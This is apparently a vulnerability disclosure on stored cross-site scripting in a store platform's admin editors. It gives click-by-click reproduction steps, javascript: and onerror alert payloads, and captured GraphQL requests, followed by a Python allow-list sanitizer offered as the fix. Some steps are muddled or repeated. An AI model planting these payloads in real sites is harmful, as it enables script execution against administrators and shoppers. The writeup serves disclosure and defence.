Correspondence from Shopify declined to comment on the newly discovered vulnerabilities in their website. Although 'frontend' vulnerabilities are considered out of scope, the tester had found himself a beefy bug bounty from the same page listed below, including similar functionality that has not been tested yet. After two emails and several reports, the 'hacker-1' staff rejected the submitted findings.

Online Store -> Pages -> Add Page -> Title -> Title_Name -> Content -> Paste Payload -> -> Show HTML -> Fix HTML encoding of tags from <script src=1 href=1 onerror="javascript:alert(1)"></script>

1. Browse to Online Store
2. Select Pages -> Add Page
3. Set Title -> Title_Name
4. Set Content -> Paste Payload ->
5. Select Show HTML
6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script>

// HTTP POST request showing XSS payload
POST /admin/online-store/admin/api/unversioned/graphql?operation=PageUpdate HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
[...]
[...] "page":{"bodyHtml":"" [...]

// HTTP response
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]
[...] page":{"id":"gid://shopify/OnlineStorePage/...","body":"\n\ntest","title":"Title_Name" [...]

Online Store -> Blog Posts -> Add Blog Post -> Title -> Blog_Title -> Content -> Paste Payload -> -> Show HTML -> Fix HTML encoding of tags from

<form><button formaction="javascript:javascript:alert(1)">X</button></form>

to

1. Browse to Online Store
2. Select Blog Posts -> Add Blog Post
3. Set Title -> Blog_Title
4. Set Content -> Paste Payload ->
5. Select Show HTML
6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script>

// HTTP POST request showing XSS payload
POST /admin/online-store/admin/api/unversioned/graphql?operation=ArticleUpdate HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
[...]
[...] "article":{"blogId":"gid://shopify/OnlineStoreBlog/...","body":"" [...]

// HTTP response showing unsanitized payload
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]
[...] "article":{"id":"gid://shopify/OnlineStoreArticle/...","title":"Blog_Title","body":"\n","handle":"blog_title-2" [...]

Products -> Collections -> Create Collection -> Title -> Product_Title -> Description -> Paste Payload -> -> Show HTML -> Fix HTML encoding of tags from

<form><button formaction="javascript:javascript:alert(1)">X</button></form>

to

1. Browse to Products
2. Select Collections -> Create Collection
3. Set Title -> Collection_Title
4. Set Content -> Paste Payload ->
5. Select Show HTML
6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script>

// HTTP POST request showing XSS payload
POST /admin/internal/web/graphql/core?operation=CreateCollection&type=mutation HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
[...]
[...] "collection":{"title":"Collection_Title","descriptionHtml":"" [...]

// HTTP response showing unsanitized payload
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]
[...] "collection":{"id":"gid://shopify/Collection/...","title":"Collection_Title","descriptionHtml":"" [...]

Products -> Inventory -> View Products -> Double Click on Product -> Title -> Inventory_Title -> Description -> Paste Payload -> -> Show HTML -> Fix HTML encoding of tags from

<form><button formaction="javascript:javascript:alert(1)">X</button></form>

to

1. Browse to Products
2. Select Inventory -> View Products
3. Select Product -> Title -> Product_Title
4. Set Description -> Paste Payload ->
5. Select Show HTML
6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script>

// HTTP POST request showing XSS payload
POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
[...]
[...] "product":{"descriptionHtml":"","workflow":"product-details-update" [...]

// HTTP response showing unsanitized payload
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]
[...] "product":{"id":"gid://shopify/Product/...","title":"Product_Title","handle":"product_title","descriptionHtml":"" [...]

Products -> Add Product -> Title -> Product_Title -> Description -> Paste Payload -> -> Show HTML -> Fix HTML encoding of tags from

<form><button formaction="javascript:javascript:alert(1)">X</button></form>

to

1. Browse to Products
2. Add Product -> Title -> Product_Title
3. Set Description -> Paste Payload ->
4. Select Show HTML
5. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script>

// HTTP POST request showing XSS payload
POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
[...]
[...] "product":{"descriptionHtml":"
...\">\n" [...]

// HTTP response showing unsanitized payload
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]
[...] "title":"Gift_Title",">\n", [...]

Products -> Gift Cards -> Add Gift Card Products -> Gift_Title -> Paste Payload -> -> Show HTML -> Fix HTML encoding of tags from

<form><button formaction="javascript:javascript:alert(1)">X</button></form>

to

1. Browse to Products
2. Select Gift Cards
3. Add Gift Card Products -> Gift_Title
4. Set Description -> Paste Payload ->
5. Select Show HTML
6. Fix HTML encoding of tags <script src=1 href=1 onerror="javascript:alert(1)"></script>

// HTTP POST request showing XSS payload
POST /admin/internal/web/graphql/core?operation=CreateProduct&type=mutation HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
[...]
[...] "product":{"title":"Gift_Title","descriptionHtml":"" [...]

// HTTP response showing unsanitized payload
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]
[...] "title":"Gift_Title","handle":"gift_title-1","descriptionHtml":"" [...]

1. Browse to /admin/pages
2. Template -> Add Section -> Contact Form -> Heading -> XSS Payload
3. Online Store -> Pages -> Add Page ->

https://test-img-src-x-onerror-alert1-test.myshopify.com/admin/settings/notifications
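Every write path above (page bodyHtml, article body, collection and product descriptionHtml) shares the same weakness: the editor entity-encodes tags on the client, the "Show HTML" view lets that encoding be undone, and the server then stores whatever markup arrives. The control that closes all of them at once is an allow-list sanitizer run server-side on the parsed markup before it is stored, plus logging of what the sanitizer had to remove. The block below is an added example, not Shopify code; it uses only the Python standard library, the tag and attribute allow-lists are assumptions chosen for a shop description, and the inputs in the demo are constructed from the payload shapes quoted in this writeup.

```python
"""Server-side allow-list sanitizer for stored rich-text HTML fields such as
a page bodyHtml or a product descriptionHtml.

Added example (not Shopify code); standard library only. ALLOWED_TAGS and
ALLOWED_ATTRS are assumptions for a shop description, not platform rules.
"""
import html
import re
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "u", "ul", "ol", "li",
                "h1", "h2", "h3", "a", "img", "blockquote", "span", "div"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
URL_ATTRS = {"href", "src", "action", "formaction"}   # scheme-checked before anything else
SAFE_SCHEMES = {"http", "https", "mailto"}
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "noscript"}  # tag AND body go
VOID_TAGS = {"br", "img"}


def _scheme_is_safe(url):
    """True for relative URLs and http/https/mailto. Whitespace and control
    characters are stripped first so a split-up scheme cannot slip past; the
    parser has already decoded entity references by the time we run."""
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", url).lower()
    m = re.match(r"^([a-z][a-z0-9+.\-]*):", cleaned)
    return m is None or m.group(1) in SAFE_SCHEMES


class _Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # sanitized output fragments
        self.findings = []   # what was removed and why (for logging/alerting)
        self._skip = 0       # >0 while inside a DROP_CONTENT_TAGS element

    def _filter_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:          # HTMLParser lowercases names for us
            value = value or ""
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS and not _scheme_is_safe(value):
                self.findings.append(f"unsafe URL in {name} on <{tag}>")
            elif name not in ALLOWED_ATTRS.get(tag, set()):
                self.findings.append(f"attribute {name} on <{tag}>")
            else:
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
        return "".join(kept)

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.findings.append(f"<{tag}> element with its content")
            self._skip += 1
            return
        if self._skip:
            return
        attr_text = self._filter_attrs(tag, attrs)  # report attrs even on dropped tags
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"disallowed tag <{tag}>")
            return   # drop the tag but keep its text content
        self.out.append(f"<{tag}{attr_text}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)   # <br/> is treated like <br>

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self._skip = max(0, self._skip - 1)
        elif not self._skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=False))  # text stays text

    def handle_comment(self, data):
        pass  # comments are dropped; a description never needs them


def sanitize_html(fragment):
    """Return the allow-listed HTML that is safe to store and render."""
    p = _Sanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)


def audit_html(fragment):
    """Return what the sanitizer would remove; an empty list means the fragment
    already conforms. A merchant editor should almost never emit event handlers
    or javascript: URLs, so any finding on the write path is worth logging."""
    p = _Sanitizer()
    p.feed(fragment)
    p.close()
    return p.findings


if __name__ == "__main__":
    # Constructed inputs: the two payload shapes quoted in the writeup, an
    # entity-encoded scheme, and benign markup that must survive untouched.
    samples = [
        '<script src=1 href=1 onerror="javascript:alert(1)"></script>',
        '<form><button formaction="javascript:javascript:alert(1)">X</button></form>',
        '<p>Size: 5 &lt; 10 &amp; <a href="&#106;avascript:alert(1)">more</a></p>',
        '<p>Ships in <strong>2 days</strong><br/><img src="/img/box.png" alt="box"></p>',
    ]
    for s in samples:
        print(repr(sanitize_html(s)), audit_html(s))
```

The sanitizer works on the parser's decoded view, so it does not matter whether the client sent `<script>` raw, as `&lt;script&gt;`, or with an entity-encoded `javascript:` scheme: text is re-escaped on output, disallowed elements lose their tags, and `script`/`style`/`iframe` bodies are discarded entirely. Wiring `audit_html` into the GraphQL mutation handlers gives a cheap detection signal as well, since a non-empty findings list on a PageUpdate or UpdateProduct call is exactly the behaviour the writeup describes.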